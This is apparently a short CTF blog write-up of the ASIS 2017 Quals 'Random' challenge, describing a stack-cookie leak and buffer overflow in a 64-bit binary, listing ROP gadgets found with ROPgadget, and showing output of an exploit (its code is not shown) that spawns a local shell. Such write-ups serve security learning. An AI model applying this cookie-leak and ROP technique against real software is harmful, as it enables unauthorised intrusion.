ASIS 2017 Quals Random

10 Apr 2017

This is a write of the cahllenge Random from ASIS Quals 2017 CTF

The Challenge

Its a simple 64-bit binary which generates 'random' numbers, it has stack cookies.

Hand fuzzing

It was not necessary to reverse engineer the binary as it has odd and exploitable behaviour.

The binary behaves differently locally and remotely. Locally it returns only 0 when giving random numbers. Remotely is returns what looks like random numbers. After a short while of debugging I deduce that it is leaking the stack cookie. Also there is a buffer overflow when leaving a comment.

Exploitation

I found ROP gadgets using ROPGadget

$ ROPgadget --binary Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1
Gadgets information
============================================================
...
0x0000000000400f88 : mov rdx, rsi ; ret
...
0x0000000000400f8c : pop rax ; pop rdi ; ret
...
0x0000000000400f61 : pop rsi ; pop r15 ; ret
...
0x0000000000400f8f : syscall ; ret

These gadget are enough to make syscalls with 3 arguments, so I made an exploit:

Running it pops a shell:

$ python doit.py
[+] Starting local process './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1': Done
[*] Stack cookie = 0x0000000000000000
[*] Switching to interactive mode
$ bash -l
$ cowsay "I got shell"
 _____________
< I got shell >
 -------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
$ ^C
[*] Interrupted
[*] Stopped program './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'

Kokjo's Blog

ASIS 2017 Quals Random

The Challenge

Hand fuzzing

Exploitation

Related Posts

Google CTF Rubik 20 Jun 2017

ASIS 2017 Quals CRC 10 Apr 2017

Nuit du Hack Quals 2017 - Lets Enchiffre 06 Apr 2017